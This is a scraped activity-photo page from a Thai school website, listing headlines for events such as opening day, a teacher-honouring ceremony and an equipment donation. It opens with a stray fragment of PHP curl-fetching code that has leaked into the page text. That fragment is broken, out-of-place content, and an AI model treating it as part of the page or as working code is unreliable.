$e=curl_exec($d); curl_close($d); return $e; } ?> ภาพกิจกรรม - Sansailuang School | https://ssl.ac.th

ภาพกิจกรรม

ขอขอบคุณ.ร.ต.ต.เกษม ที่มาสร้างภูมิคุ้มกัน ด้านต่างๆๆ ให้กับน..

ผอ.ประพันธ์ ทองหนัก พบปะ จราจรหน้า รร.

กิจกรรมวัดความรู้พื้นฐานของนักเรียนผ่านทางข้อสอบออนไลน์

คณะวิศวกรรม มช. มอบครุภัณฑ์ให้โรงเรียนสันทรายหลวง

คณะครูฯ และนักเรียนทุกคน ร่วมกันปรับแต่งเติมสนามหญ้า

ต้อนรับคุณครูนาฏศิลป์คนใหม่

กิจกรรมเสริมสร้างความรู้ความบรรเทิงจาก สวท.เชียงใหม่

ลูกเสือเนตรนารีจิตอาสาพัฒนาโรงเรียนร่วมกันคะ

เปิดเรียนวันแรก 16 พ.ค. 2566

กิจกรรมพัฒนาศักยภาพและปฐมนิเทศนักเรียนระดับชั้นมัธยมศึกษาตอน..

ประชุมฯ เตรียมความพร้อมก่อนเปิดเรียน 1/2566

พิธีไหว้ครู ประจำปีการศึกษา 2566